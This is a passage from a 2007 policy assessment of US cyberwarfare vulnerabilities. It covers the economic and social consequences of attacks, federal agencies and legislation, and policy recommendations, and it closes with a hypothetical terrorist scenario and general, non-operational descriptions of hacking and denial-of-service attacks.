0.4 Consequences

The discussion of vulnerabilities above demonstrated that the direct, physical damage caused by a cyber-attack depends completely on the nature of the attack and its target. While the potential economic and social consequences of an attack can also vary widely, and are speculative in nature, evidence suggests those consequences could be as considerable as the physical damage, if not more so.

0.4.1 Economic Consequences

Cyber-warfare incidents can be costly even when conducted by small groups of attackers. There have been several incidents of hackers causing significant financial damage. For example, the “I Love You” virus caused $10 billion in damage. This virus was created by a single student in the Philippines whose PhD thesis had been rejected.

An even greater threat lies in the many critical infrastructures that could be attacked. The transportation system is an appealing target to potential cyber-attackers due to the integral role it plays in the economy. Transportation accounts for over 10 percent of the nation’s gross domestic product. The recent history of conventional terrorism also suggests that cyber-attackers may choose to target transportation systems, provided feasible opportunities exist. Eighteen of the twenty-five major terrorist attacks from 1983 to 2001 “involved the use of transportation vehicles as weapons, and another five involved attacks on planes.”[24] Only one successful cyber-attack on the transportation system that caused significant damage or loss of life would be needed for an impact to be felt on the economy and public perception.

A successful attack on the power grid presents the greatest economic threat among critical infrastructures. The New York power outage that lasted only one day cost the United States an estimated $6 billion.[25] The cost of a regional power outage caused by a cyber-attack could approach one trillion dollars per month. An impact this big on the U.S. economy would affect almost every citizen in the country.

[23] http://www.gao.gov/new.items/d05712.pdf
[24] Szyliowicz, Joseph S. (2004). International transportation security. Review of Policy Research. 21
[25] “An Analysis of the Consequences of the August 14th 2003 Power Outage and its Potential Impact on Business Strategy and Local Public Policy”. 2004. <http://www.acp-international.com/southtx/docs/ne2003.pdf>

0.4.2 Social Effects

Because there has not been, to date, a successful cyber-attack on the United States on a large enough scale to widely affect the general population, the possible social consequences are largely speculative.

One predictable result of a successful, or nearly successful, attack is that the public could lose confidence in the government’s ability to protect the nation from cyber-attack. Polling already shows a majority of the public feels the nation needs new legislation to strengthen cyber-security,[26] and experts have repeatedly warned the government to do so.[27] If a massive cyber-attack occurred, the public could lose faith in the government rapidly. If a specific private sector entity responsible for infrastructures or other critical systems were attacked, that entity could experience a similar loss of trust.

However, data also exists to suggest that the social impacts of a cyber-attack would likely be brief unless the attack led to considerable physical damage or loss of life. For example, several accidents and other recent cyber-incidents have caused air traffic control centers to shut down, but no data exists to suggest those incidents had any effect on potential air travelers. Even in the case of September 11, the loss of demand for air travel was greatly reduced only two years later.[28] Another case in which the social impacts might be long term would be ongoing successful attacks that do not cause considerable physical damage or loss of life, but nonetheless cannot be prevented.

0.5 National Agencies and Legislation

In recent years, several documents and laws have been created to define the government’s role in dealing with cyber-security issues, beginning with the E-Government Act of 2002. Since that time, several new agencies have been created to accomplish the nation’s cyber-security objectives.

0.5.1 E-Government Act of 2002

Much of the federal government’s current policy and organizational structure to deal with cyber-warfare was created by the E-Government Act of 2002. The Act established that the Office of Management and Budget (OMB) was responsible for overseeing other federal organizations’ cyber-security policies. The Department of Homeland Security has also become responsible for coordinating many of those agencies. The E-Government Act also outlined the roles several other organizations should fill in dealing with cyber-security.

[26] “Poll Shows Americans Want Congress to Do More to Protect Them Online.” Cyber Security Industry Alliance (2006): 30. 21 Oct. 2007
[27] “Interview: O. Sami Saydjari.” Frontline: Cyber War! 23 Apr. 2003. PBS. 24 Oct. 2007 <http://www.pbs.org/wgbh/pages/frontline/shows/cyberwar/interviews/saydjari.html>
[28] Ito, Harumi, and Darin Lee. Assessing the Impact of the September 11 Terrorist Attacks on U.S. Airline Demand. Dept. of Econ., Brown U. 2004. 3-24. 26 Oct. 2007

0.5.2 National Infrastructure Advisory Council

One organization outlined by the E-Government Act is the President’s Critical Infrastructure Protection Board (PCIPB), now known as the National Infrastructure Advisory Council (NIAC).[29] The NIAC is designed to supply the executive branch with the information needed to secure the information systems of critical infrastructure sectors, and it deals with both prevention and recovery strategies.[30]

0.5.3 National Strategy to Secure Cyberspace

In 2003, before its name was changed, the PCIPB published the National Strategy to Secure Cyberspace (NSSC), a document outlining stakeholders, guiding principles, and broad policy objectives to consider in improving the national cyber-warfare policy. This assessment uses the broad policy objectives in the NSSC as a starting point for its discussion of policies, but expands beyond the initial policy suggestions.

0.5.4 United States Computer Emergency Response Team (US-CERT)

Another organization established by the E-Government Act of 2002 is the United States Computer Emergency Response Team (US-CERT), designed to protect the Internet from cyber-attacks by promoting the communication of cyber-incidents between private and public sector groups.

A number of initiatives to improve cyber-security information sharing are handled by US-CERT, including the Einstein Program and several collaborative groups. US-CERT also includes the National Cyber Security Division (NCSD), which is designed to evaluate the risks of various attacks, determine what protective measures are needed, and create a set of protocols to follow in response to cyber-incidents.

0.6 Policies

The success of existing cyber-security policies has been mixed, and cyber-security remains an area in need of many new policies and programs. The key stakeholder groups currently being considered are sound, and the concerns currently being addressed correspond loosely to the broad policy areas established by the NSSC. Still, much work remains to be done to improve cyber-security.

[29] Bush, George W., and Jim Turner. "E-Government Act of 2002." The White House. 15 Nov. 2002. US Government. <http://www.whitehouse.gov/omb/egov/g-4-act.html>.
[30] “National Infrastructure Advisory Council.” Department of Homeland Security. Oct. 2007. US Government. <http://www.dhs.gov/xprevprot/committees/editorial_0353.shtm>.

0.6.1 National Policies

A portion of the Department of Homeland Security is dedicated to securing America from cyber-attacks. According to the NSSC, existing national policy in this area has given the federal government a mandate to:[31]

1) Prevent cyber attacks against our critical infrastructures
2) Reduce our national vulnerabilities to cyber attack and
3) Minimize the damage and recovery time from cyber attacks that do occur. Ensure the federal government’s ability to perform essential national security missions and guarantee the general public’s health and safety
4) Make sure that state and local governments are able to maintain order and to deliver minimum essential public services
5) Aid in the private sector’s capability to ensure the orderly functioning of the economy and the delivery of essential services and
6) Support the public’s morale and confidence in our national economic and political institutions.

0.6.2 Policy Goals

Although the NSSC has been a starting point for current national policies, those policies are not enough to protect our nation from cyber-warfare. Our policy discussion will be broken into the following major policy areas: prevention, response, cyber-security training and awareness, governmental cyber-security, international cyber-warfare collaboration, and military uses of cyber-warfare.

0.6.3 Guiding Principles

In addition to meeting the above goals, several basic principles should guide future cyber-warfare policies. For example, policies should encourage the nationwide cooperation of private and public sector groups, strengthen rather than infringe upon personal privacy, and avoid mass regulation wherever practical. Also, policies should be flexible enough to adapt to the ever-changing nature of cyber-warfare.

Several social considerations exist with regard to cyber-warfare policies. One is the loss of privacy in cyberspace; another is the censorship of the Internet which would occur if the government began to block certain websites. These privacy concerns make the cooperation of public and private sector entities even more essential.

[31] "National Policy and Guiding Principles." National Strategy to Secure Cyberspace. Feb. 2003. US Government. <http://www.whitehouse.gov/pcipb/policy_and_principles.pdf>.


0.6.4 Stakeholders

American citizens and organizations are the primary stakeholders with regard to national cyber-warfare policy. That said, virtually everyone can be considered a stakeholder, either for their direct use of the Internet or for their reliance on the critical infrastructures that depend on computer systems. The NSSC describes five specific stakeholder groups: home and small business computer users, large enterprises such as corporations and universities, critical sectors and infrastructures, the nation as a whole, and the international community.[32]

0.6.5 Policies of Prevention

While the government is taking steps to improve collaboration between groups in the response to cyber-attacks, much of the task of actually preventing cyber-attacks is still in the hands of the private sector.

One of the most effective means of preventing cyber-attacks is to effect a widespread change in behavior among systems administrators; for example, if they kept their computer systems up-to-date with the latest security patches, a major vulnerability would be reduced. Many tools exist to safeguard against cyber-attacks, such as antivirus programs and firewalls, but they are optional purchases and are not available for many less standardized computer systems. Similarly, there are many different competing cyber-security certification programs and no uniform process for licensure or certification. Also, software and hardware makers are not legally required to include security features of any kind in their products.

One controversial policy option would be to require by law that all computers be secured in specific ways; however, such a law would need to be abstract enough to accommodate the evolving nature of threats and should balance added security against added costs. Another is to hold software producers and systems administrators responsible for damage caused by their products or systems; again, the added cost of production and maintenance must be weighed. Also, a uniform process for cyber-security licensure and certification could be created to ensure a standardized level of cyber-security knowledge.

One distinct area to consider is the prevention of cyber-attacks on infrastructure systems. A policy option in this area is to regulate a minimum level of cyber-security for all components of the national infrastructure, because one weak link can allow an attack to damage entire areas of infrastructure.

0.6.6 Policies of Response

It is difficult to identify and apprehend cyber-attackers. Because of this, legal action against them is typically handled at the federal level. However, numerous case studies exist to suggest that the sentences given to convicted cyber-attackers are not nearly severe enough to match the damage caused by attacks. Accordingly, one policy option is to increase minimum and maximum sentencing guidelines for cyber-attackers, and to pursue longer sentences more vigorously.

[32] "National Policy and Guiding Principles." National Strategy to Secure Cyberspace. Feb. 2003. US Government. <http://www.whitehouse.gov/pcipb/policy_and_principles.pdf>.

The National Cyberspace Response System is the current strategy to handle responses to cyber-attacks. This response system includes analysis of cyber-attacks, communication of warnings when a cyber-attack might be repeated or may spread, reporting and classification of incidents, and recovery from a cyber-attack.[33]

Several recent exercises were organized to coordinate response efforts between public and private sector organizations, and were reported to be successful in increasing communication between groups.[34] However, many private sector organizations worry about damage to their public image if a cyber-incident occurs and is publicized, and others think the existing channels to relay information are insufficient.[35]

New policies should define more clearly a method of communicating cyber-incidents to the public, so the actual risks and impacts of incidents will be understood. Also, private sector organizations could be given financial incentives for communicating reports of their cyber-security measures and any incidents that occur. Finally, as attacks on the Internet can affect the world as a whole, the United States should open a new dialogue with other countries to create a uniform cyber-attack response policy.

0.6.7 Policies for Public Awareness and Training

Several programs are in place to promote public awareness of cyber-security and the cyber-security training of IT professionals. For example, US-CERT offers e-mail bulletins to inform the public of incidents and security tips, and the NCSD has created a website, Stay Safe Online, to inform computer users in all sectors of ways to improve personal cyber-security practices.36 However, while some studies have shown an awareness of cyber-security concerns among corporate IT personnel, others have shown that IT personnel fail to follow the most basic cyber-security measures, such as reporting incidents to anyone outside the corporation.37

Because the US-CERT bulletin and Stay Safe Online have not reached high levels of public exposure, increased federal funding for these programs is needed. Another option is to provide financial incentives for small businesses and enterprises whose employees complete a basic cyber-security course. A uniform licensure and certification process, as described in the Policies for Prevention section, could help to ensure the proper level of training for IT personnel.

Another option is to create a national database of cyber-incidents that occur at critical infrastructure elements and a daily cyber-security threat level indicator; these would provide an incentive for the private sector to maintain a strong public image by preventing incidents and would raise overall public awareness.

33. Ibid.
34. "Fact Sheet: Protecting America's Critical Infrastructure – Cyber Security." US-CERT. Department of Homeland Security. <http://www.us-cert.gov/press_room/050215cybersec.html>.
35. "Government Collaboration Groups and Efforts." US-CERT. Department of Homeland Security. <http://www.us-cert.gov/federal/collaboration.html>.
36. National Cyber Security Alliance: Stay Safe Online. Retrieved October 31, 2007, from Stay Safe Online Web site: http://www.staysafeonline.org/
37. Gagnon, B. (2004). Are We Headed For a Cyber-09/11? The American Failure in Cyberstrategy. Conference Papers -- International Studies Association. Retrieved October 24, 2007, from Academic Search Premier database.

0.6.8 Policies for Government Cyber-security

The federal government is responsible for securing many critical institutions such as the military, emergency services, and financial institutions from cyber-attack. Accordingly, one priority of the government must be to protect its own computer systems. The OMB has assessed the vulnerabilities of many computer systems within the government and has established basic federal guidelines for agencies to follow; the guidelines must be met before an agency can obtain funding for system upgrades.38 A process has been established by which agencies can improve security and work towards meeting those guidelines.

However, at the level of individual agencies, there is no uniform cyber-security testing procedure, and many agencies rely on outside contractors to upgrade their computer systems. And while system upgrades are checked by the OMB for cyber-security measures, existing systems lack basic security measures such as password complexity requirements and security patches.

At an agency level, new policies are needed to mandate more robust passwords and more frequent password changes; another possible measure is the creation of a physical identification card system whereby “smart cards” would be needed to access a government computer. Also, the IT departments of government agencies should be required to document the structure of their computer systems and their installation of security patches.

One agency of special concern is the FAA. A mandate could be issued that future development of the FAA’s air traffic network continue to favor decentralized, redundant control centers. Also, the FAA (and possibly other government agencies as well) could be required to limit the access of outside IT contractors to only the areas that directly relate to their work assignments.

Across all agencies, best-value evaluations should be used when selecting outside contractors; the OMB could establish which contractors provide the best services and establish a certification system. Another possible policy is that a federal “red team” of security testers be created to periodically test the cyber-security vulnerabilities of government computer systems.

0.6.9 Policies for U.S. and International Cyber-warfare Collaboration

Because of the Internet’s worldwide presence and the interconnectedness of computer systems around the world, the United States must enact policies to secure our own systems from attacks originating from other countries. Of equal importance are policies for nations to work together to secure the global cyberspace.

38. “Priority IV.” The National Strategy to Secure Cyberspace. February 2003. 30 Oct. 2007 <http://www.whitehouse.gov/pcipb/priority_4.pdf>.

To protect the nation from attacks originating abroad, more robust preventative and counterintelligence capabilities must be developed; almost no true counterintelligence options exist. Also, a better system for reporting cyber incidents to system administrators around the nation is needed.

Many efforts have been made to influence the cyber-security efforts of other nations, including U.S. discussions with the Organization of Economic Cooperation and Development (OECD), the G-8, and the Asia-Pacific Economic Cooperation forum (APEC).39 However, there is no widely accepted international treaty or agreement to establish a global cyber-security policy, and no international network of agencies for information relay exists.

The federal government should work with other nations to adopt a set of international cyber-security standards to be followed, to ensure all international computer systems have a minimum level of security. One starting point in a global cyber-security policy could be the creation of a regional North American cyberspace “safe zone,”40 in which the U.S. would work with Canada and Mexico to ensure the countries work to solve mutual cyber-security issues. Other regional alliances and unions, such as the European Union, should be encouraged to take similar steps.

In 2001, an international Convention on Cyber-crime was held and a treaty to promote international cyber-crime collaboration was ratified by 43 countries. However, greater efforts should be made to follow the treaty’s guidelines and to encourage more nations to sign the treaty.

Other nations have their own cyber-warfare policies that the United States can learn from. The U.K.’s policies are similar to ours, but their legal framework to handle cyber-attackers is more robust. Germany’s policy differs from ours in that they consider any attempt to control German media an act of war, and they are considering whether economic cyber-warfare could be used during a conflict with another nation. Russia considers cyber-attacks to be second only to nuclear attacks in terms of danger, and their policy is relatively aggressive; however, they have also made it illegal for Russian citizens to carry out a cyber-attack. China is actively developing its offensive cyber-warfare capabilities, which demonstrates the need for international collaboration.

0.6.10 Policies for Military Use of Cyber-warfare

One policy area not discussed in the NSSC concerns the military’s policy with regard to the use of cyber-warfare against, and by, the Armed Forces. Cyber-warfare options have historically been handled by the Space Command, but in 2007 the Air Force was given that responsibility; the Computer Network Operations group (CNO) is specifically tasked with military cyber-warfare policies.41

39. “Priority V.” The National Strategy to Secure Cyberspace. February 2003: 51. 23 Oct. 2007 <http://www.whitehouse.gov/pcipb/priority_5.pdf>.
40. Ibid.
41. Wilson, Clay (2007). “CRS Report for Congress: Information Operations, Electronic Warfare, and Cyberwar: Capabilities and Related Policy Issues.” 30 October, 2007. <http://stinet.dtic.mil/cgi-bin/GetTRDoc?AD=ADA466599&Location=U2&doc=GetTRDoc.pdf?>

There have been no confirmed uses of cyber-warfare by the United States military, though cyber-warfare tactics were considered and, some rumors state, used in Kosovo and Operation Iraqi Freedom.42 Also, the federal government is leading efforts to promote cyber-warfare education, as evidenced by a cyber-warfare scholarship program sponsored by the Department of Homeland Security and the National Science Fund.43

It is likely that the use of cyber-attacks as an alternative to conventional attacks can reduce civilian damages, because infrastructure systems could be shut down temporarily but not permanently damaged; capabilities to carry out this sort of cyber-attack should be researched. Consideration of cyber-warfare tactics should be integrated into national strategic planning and any future discussions of redefining the military’s mission. One policy option is to expand cyber-warfare training within the military and at universities to make our Armed Forces more skilled at cyber-warfare tactics, should the need to use them arise. Also, a set of rules to guide our use of cyber-warfare tactics, both offensively and defensively, should be developed, along with a more clearly defined national cyber-warfare strategy. Finally, an international convention should be developed, possibly through the United Nations, to handle the legality of offensive cyber-attacks.

0.7 Conclusion

0.7.1 Is Cyber-warfare a Threat?

Our vulnerability to cyber-attacks is clear, especially when the means of attack are so readily accessible. However, the effects from these vulnerabilities are still limited, and are best exploited only with a coinciding physical attack. We do not face the doomsday that some predict, but we do have a system in need of a drastic overhaul and upgrade. With better implementation of established cyber-security practices, along with proactive research and development, we can reduce the glaring weaknesses in our cyber-defense and mitigate the vast majority of cyber threats.

0.7.2 The Way Forward

This assessment’s recommended “best policies” are divided into policies to implement immediately, policies for the near future, and areas for future research.

42. “Cyber-war!” PBS: Frontline. April 2003. 29 Oct. 2007 <http://www.pbs.org/wgbh/pages/frontline/shows/cyberwar/interviews/arquilla.html>.
43. Wilson, Clay (2007). “CRS Report for Congress: Information Operations, Electronic Warfare, and Cyberwar: Capabilities and Related Policy Issues.” 30 October, 2007. <http://stinet.dtic.mil/cgi-bin/GetTRDoc?AD=ADA466599&Location=U2&doc=GetTRDoc.pdf?>


The policies to implement immediately are relatively simple and no significant barriers to their implementation exist. The government should immediately make sentencing standards for cyber-criminals more severe, increase publicity funding for existing federal programs for cyber-security awareness, require government agencies to document their cyber-security progress, and expand cyber-security training within the military and at universities.

The policies for the near future may take a few years to develop. For instance, a uniform cyber-security licensure can be created, and a more robust process can be made to test the cyber-security of federal agencies. Policies to encourage other nations to prevent cyber-attacks can be developed, and international cyber-security standards can be agreed upon. Cyber-warfare can be given a greater role in national strategic and military planning. Finally, a legally binding set of security requirements can be made for new software and hardware products.

Though it will require extensive research, planning, and diplomatic efforts, a goal should be set to establish and ratify within ten years an international treaty creating a uniform cyber-security policy, a framework for interagency cooperation and response, and a global network for information sharing. In the same time period, a goal could be made to establish a cyber-warfare equivalent to the Geneva Convention to establish rules governing military use of cyber-warfare.

Although there is never an impenetrable defense from cyber-attacks, the United States can greatly limit the threat of cyber-warfare over time by implementing these proactive policies.


1 Introduction


It is difficult to grasp how reliant the United States has become on computers and the networks that connect them. The Internet and computer networks are absolutely vital to a functioning electric power grid, a consistent water supply, nearly all communications networks, many transportation systems, key financial systems, public health systems, postal service, government and defense, and many other systems that support our nation. The Internet, originally designed to allow communication in the event of a nuclear war, could be the next weapon to attack a society revolving around information technology.44

Cyber-warfare indisputably has the potential to cause catastrophic damage to these systems in a world vastly influenced by cyberspace. Given this assumption, one must address the probability of various types and combinations of cyber-attacks that could damage critical systems, as well as the options for response and prevention. Securing this nervous system will require significant resources from the public and private sector, as well as significant efforts from everyone connected to the Internet. Given the power and influence of cyber-warfare, there are also possibilities of cyber-warfare as an effective offensive weapon that must be considered.

1.1 What Is at Stake?

The worst-case scenario of cyber-warfare would involve a combination of cyber-attacks and physical attacks. However, to get an idea of the potential scale of cyber-attacks, consider this hypothetical situation.

It is a sunny weekday in Chicago. A few days earlier, a terrorist organization hacks into the federal government’s electronic shipping manifest system. The terrorists find a shipment of nuclear material, and intercept the truck and steal its contents. They then load this nuclear material along with a detonator onto a chartered plane at a local air strip.

Simultaneously, the terrorist organization hacks into the regional power grid and FAA computer systems. Once in the power grid, they gain control over a key power generator, and force it out of its natural oscillation, which in turn destroys the generator, and crashes the power grid in the greater Chicago area. In the FAA system, hackers knock out the radar systems in the area, and delete all recorded flight plans in the region.

The chartered plane, in the air near Chicago, uses the immediate confusion to fly into restricted airspace directly over the heart of the city, and detonates in mid-air, raining nuclear material down over the entire city.

Lastly, the terrorists hack into the SCADA system controlling Chicago’s water treatment facilities. Through a series of commands, they route millions of gallons of untreated wastewater into the Chicago River, destroying the water quality and ecosystems down river. Ultimately, the water flows into the Mississippi River.

All told, these terrorists rained radiation onto nearly 3 million residents, and required the entire area to be evacuated until the federal government could determine the radiation levels, and either begin a clean-up program or abandon the city entirely. The mixture of sewage and the threat of radiation flowing down the Mississippi River creates panic all along the river basin, which includes St. Louis, Memphis, and New Orleans. Power in the region is significantly damaged, requiring new generators to return to pre-attack output level, straining surrounding systems, potentially knocking them offline as well. The cost in lives and dollars is unknown, but far higher than any attack on US soil.

44. Global Society: Journal of Interdisciplinary International Relations; Jan 2003, Vol. 17 Issue 1, p89, 9p.

1.2 Is Cyber-Warfare a Real Threat?

While it is highly unlikely that a terrorist organization could currently coordinate an attack as massive and complex as the scenario described above, each component of the scenario is more realistic by itself. Each component has either been described as a possibility by the United States government or private-sector entities, or has been shown to be possible by actual cyber-incidents.

Is cyber-warfare a real threat? The immediate answer is that cyber-warfare is real enough that it cannot be ignored, although the scope and magnitude of this threat varies across different areas of key infrastructure. Even in cases where the current threat is limited, the threat will increase in the future.

Some critics of this conclusion rely on the history of cyber-warfare.45 To date, there have been no successful large-scale cyber-attacks on the United States that have brought significant economic or social damage on a national scale. Many professionals in this group of skeptics contend that terrorist organizations are not capable of catastrophic cyber-attacks.46 These skeptics are also comfortable with nation-states who have cyber-warfare capabilities because there is currently not a strong motive to use their resources aggressively. While nation-states do not currently have an interest in engaging in a large-scale cyber-war, the majority of cyber-attacks against the United States government are believed to be sponsored by other nations. There is also evidence that international terrorist organizations are actively recruiting and training specialists to adapt their operations to the cyber world.

After the horrific attacks on September 11, 2001, reports repeatedly claimed that crashing commercial airliners into large buildings was an attack method that no one could have predicted. These reports did not take into account al-Qaeda’s attempt to crash an Airbus A300 into the Eiffel Tower in 1994 before French Special Forces stormed the plane.47 In 1994, the CIA prevented a plot to crash a plane into CIA Headquarters in Langley, Virginia.48 Ramzi Yousef was arrested in 1995 in the house of a family member of Osama bin Laden with plans for a suicide bombing of CIA headquarters and exploding eleven other U.S. commercial jets as they approached airports.49 The Federal Research Division warned in 1999 that “Suicide bomber(s) belonging to al-Qaida's Martyrdom Battalion could crash-land an aircraft packed with high explosives (C-4 and Semtex) into the Pentagon, the headquarters of the Central Intelligence Agency (CIA), or the White House.”50 Because there were no previous successful attacks similar to those that occurred on September 11, 2001, America was unprepared and utterly shocked. A similar rationale is being applied to the possibilities of cyber-warfare. Evidence will be revealed in our research that cyber-warfare could be another catastrophe waiting to happen, and the government must take proactive measures to prevent another enduring loss. There are warning signs that terrorist organizations such as al-Qaeda are developing cyber-warfare capabilities, as well as clear signals that foreign nations are preparing for a future cyber war. There are clear warning signs—as this assessment will show—that the United States of America is vulnerable to cyber-attacks.

45. Laprise, John. IEEE Technology & Society Magazine. Vol. 25 Issue 3, pg. 28.
46. Ibid.
47. Profile: Eiffel Tower. December 24, 1994: Al-Qaeda Connected Militants Attempt to Crash Passenger Jet into Eiffel Tower. http://www.cooperativeresearch.org/entity.jsp?entity=eiffel_tower
48. Favish, Allen J. Clinton and 9/11. FrontPageMagazine.com, Tuesday, October 14, 2003. http://www.frontpagemag.com/articles/Read.aspx?GUID={245984FA-D9DF-46E9-8EF3-7B5259A51C0D}
49. Wiren, Christopher S. Plot of Terror in the Skies Is Outlined by a Prosecutor. The New York Times, May 30, 1996. http://query.nytimes.com/gst/fullpage.html?res=9F01E1DD1E39F933A05756C0A960958260&sec=&spon=&pagewanted=all

1.3 Defining Cyber-attacks

Before we can begin to assess cyber-crime, cyber-terrorism, and cyber-warfare, we must first differentiate between these concepts in order to establish the scope that each covers. There are many nuances between the three, including the scale of the cyber-attack and the objectives that it is intended to achieve. Defense Acquisition University classifies any cyber-attack that is not intended to threaten national security or further operations against national security as cyber-crime.51 Cyber-terrorism, on the other hand, refers to cyber-attacks launched by individuals or small terrorist organizations that are intended to further political or social objectives by coercing a government or its people.52 Cyber-warfare has the same objectives as cyber-terrorism, except that it consists of cyber-attacks launched by a national government as an act of war, just as a physical attack would be.53

One important distinction is that to be considered an act of cyber-terrorism or cyber-warfare, a cyber-attack must be an intentional operation against national security. An unintentional attack on national security, such as that of an inept hacker, is considered cyber-crime as long as the intent of the attack is self-serving, and not intended to further a national or ideological objective. However, that is not to say that these unintentional attacks on national security cannot be as harmful as cyber-warfare and cyber-terrorism, and for the purposes of this assessment, they will be treated the same way. While cyber-crime is a major problem in the US and many other countries, this assessment is concerned primarily with the effects of large-scale cyber-attacks on national security, and how the United States can be best prepared to both defend against and potentially execute them.

50. Hudson, Rex A. The Sociology and Psychology of Terrorism: Who Becomes a Terrorist and Why? September, 1999. A Report Prepared under an Interagency Agreement by the Federal Research Division, Library of Congress. http://www.fas.org/irp/threat/frd.html
51. Alford, Jr., Lt. Col. Lionel D. "Cyber Warfare: Protecting Military Systems." Acquisition Review Quarterly Spring 2000: 101-120. 18 Oct. 2007 <http://www.dau.mil/pubs/arq/2000arq/alford.pdf>.
52. Denning, D. (2001). "Is Cyber Terror Next?" New York: U.S. Social Science Research Council, at http://www.ssrc.org/sept11/essays/denning.htm
53. Alford, Jr., Lt. Col. Lionel D. "Cyber Warfare: Protecting Military Systems." Acquisition Review Quarterly Spring 2000: 101-120. 18 Oct. 2007 <http://www.dau.mil/pubs/arq/2000arq/alford.pdf>.

2 Tools for Cyber-Attacks


2.1 Hacking

Hacking is a blanket term that has been seized by the media. Traditionally, a “hacker” has simply been a skilled computer user.54 A number of terms, including “cracker,” specifically refer to malicious computer users who usually garner the attention of the media. Due to the popularity and familiarity of the term, “hacking” will be used in this document to refer to all forms of cyber-attacks, and “hacker” for the individuals initiating them.

Hackers are usually either socially or financially motivated. The Internet has given hackers a community in which to share their exploits, in both senses of the word, and give ideas to new avenues of attack. Often, a newly found vulnerability will generate a flurry of activity in a hacking community, with different groups or individuals competing to be the first to distribute a new exploit. Alternatively, there are many documented cases where hackers discovered vulnerabilities in popular software and operating systems and offered to sell these finds on underground auction sites.55,56 These motivations are in addition to the motivation of theft through fraud and identity theft.

Hackers’ primary goals typically consist of either information theft or damage to computer systems. Procured sensitive information can be the gateway to various forms of fraud, such as identity theft, or to vulnerable systems such as SCADA systems. Hackers use common vulnerabilities in sensitive systems and even the aforementioned stolen information to cripple vital processes and functionality. With regards to cyber-warfare, possible targets include classified data, and a bevy of vital systems with control over communication and infrastructure.

The tools outlined in this section are only a small view of a hacker’s arsenal, but they have been defined because awareness is the first step to eliminating the vulnerabilities they create, and they offer something of an idea of how hackers view the systems that governments and corporations use to store and transfer information.

2.2 Denial of Service Attacks

A “Denial of Service” attack, or DoS attack, is one of many methods employed by participants in cyber-warfare to cause damage. The damage caused by such an attack is the disabling of a computer or network. The extent of the damage is dependent upon the functions of the system being attacked; typically the attacks cause economic damage and sever communications. As organizations become more dependent on computers and the Internet, the consequences of DoS attacks become more dangerous.57

54. Raymond, Eric. The on-line hacker Jargon File 4.4.7. 29 Dec 2003. 26 Nov 2007 http://www.catb.org/jargon/html/index.html
55. Naraine, Ryan. Hackers Selling Vista Zero-Day Exploit. 15 Dec 2006. eWeek.com. 26 Nov 2007. <http://www.eweek.com/article2/0,1895,2073611,00.asp>
56. Evers, Joris. Russian hackers ‘sold WMF exploit’. 3 Feb 2006. ZDNet.co.uk. 26 Nov 2007. <http://news.zdnet.co.uk/software/0,1000000121,39250232,00.htm>

There are many specific types of DoS attack, but the common effect of them all is that legitimate users of the services provided by a system are prevented from using that system. CERT (Computer Emergency Response Team) classifies the following activities as DoS attacks:

● attempts to "flood" a network, thereby preventing legitimate network traffic
● attempts to disrupt connections between two machines, thereby preventing access to a service
● attempts to prevent a particular individual from accessing a service
● attempts to disrupt service to a specific system or person (CERT)58

The DoS attack takes advantage of the most basic limits of computers: finite memory, finite processing speed, and finite communication bandwidth. These limits, while rapidly growing, will always remain finite and cause problems when attackers manage to breach them. Once a computer runs out of a limited resource that it needs to function, the system becomes disabled, and can stay disabled for a wide range of time, depending on the style of DoS attack used and the determination of the attacker.

In addition to consumption of the scarce resources of computers, Denial of Service can also be achieved by altering or destroying configuration files needed by a system, or even through physical destruction of components. Any device that communicates with a computer and is accessible through a network is vulnerable. The embedded computers that are present in many electronic devices have the same limits and vulnerabilities to DoS attacks as the common desktop systems, especially the ones that are connected to the Internet constantly. It is dangerous to assume that a device that does not look like a typical desktop computer cannot be a target, or that potential attackers will be unable to communicate with a device. Any computer-based system that can be communicated with remotely, and would have negative consequences if authorized users of the system were prevented from using it, can possibly be damaged by a Denial of Service attack.

2.2.1 Vulnerabilities

Owners of computer systems often underestimate their vulnerabilities and fail to consider taking measures to prevent or respond to DoS attacks. A common assumption is that the system does not communicate with remote devices enough to be affected, or that only popular web shopping sites suffer from this attack. Individuals can also be targeted in addition to organizations, potentially cutting off a person's communication completely. A wide variety of machines rely on networks to function, which are not necessarily public web sites, though the web-based incidents tend to be the most visible.

57. Moore, David et al. Inferring Internet Denial of Service Activity. ACM Transactions on Computer Systems. Vol. 24, No. 2, May 2006, 115–139.
58. CERT Coordination Center – Denial of Service Attacks. 4 Jun 2001. US CERT. 30 Oct 2007 <http://www.cert.org/tech_tips/denial_of_service.html>.

2.2.2 Sensor Networks

Sensor networks are an example of a class of practical devices that Denial of Service can target to cause harm. Various sensor devices are used to protect and monitor military, environmental, and other safety-critical infrastructures and resources. The failure of certain sensors can potentially cause physical damage to people. Machines exist that can record and transmit data on many different environmental properties, and are increasingly reliant on computers to function. These new sensor networks are often found replacing older systems where machinery was more confined to a limited and controlled environment. Systems of sensors communicate over a network with a computer which processes the data acquired by the devices and acts on the information appropriately. It is easy to imagine sensor networks forming warning systems and becoming part of military scenarios.

With new advances in technology, sensor networks are finding many new applications and becoming smaller and cheaper, though many still use them under the assumption that they still operate in their old enclosed environments. The design of many sensor devices does not take security into consideration during the design process, allowing intelligent adversaries to hinder the usage of often critical information.59

Mobile devices like PDAs and cellular phones are also valid targets for DoS attacks. A mobile device can be remotely shut off, have its communications channels flooded, or be made to drain its battery power. Many devices can be crashed and made to shut off by sending specific pieces of data. Because phones and PDAs are small and weak compared to typical computers, overwhelming them with more messages than they can handle is not difficult to accomplish.

Battery exhaustion techniques are a style of DoS attack unique to mobile devices. It is possible to feed data to a mobile device that forces its power to drain faster, such as repeatedly requesting a connection to the device, even if the connection is always denied. Portable wireless devices have become popular and widely depended upon in society. As mobile devices replace older technologies, many inappropriate assumptions from those old technologies are still applied to the new, which can cause the risk of a DoS attack to be neglected.60

2.2.3 Denial of Service on the Internet

Denial of Service attacks on different systems have been happening for decades, but have not

gained much attention until the first “Distributed Denial of Service” attacks, or DDoS attacks,

started happening against computers connected to the Internet. DDoS attacks are different from

regular DoS attacks in that the target is brought down by many networked computers working

together. Regular DoS attacks on the Internet were not seen as a large threat because detecting an

attack and blocking it was relatively simple. Malicious messages would come from a specific

computer, which could be traced and banned from communication. Distributed DoS attacks were

59

Wood, Anthony & Stankovic, John. Denial of Service in Sensor Networks. IEEE – Computer. Oct 2002. 54 - 62 60

Dagon, David. Mobile Phones as Computing Devices: The Viruses Are Coming!. IEEE – Pervasive Computing.

Oct – Dec 2004. 11 - 15

Page 31: Cyberwarfare Vulnerability Assessment (2007)

31

first noticed in 1999, which employed hundreds of computers in bringing down a target system,

and presented new challenges to computer security experts61

.

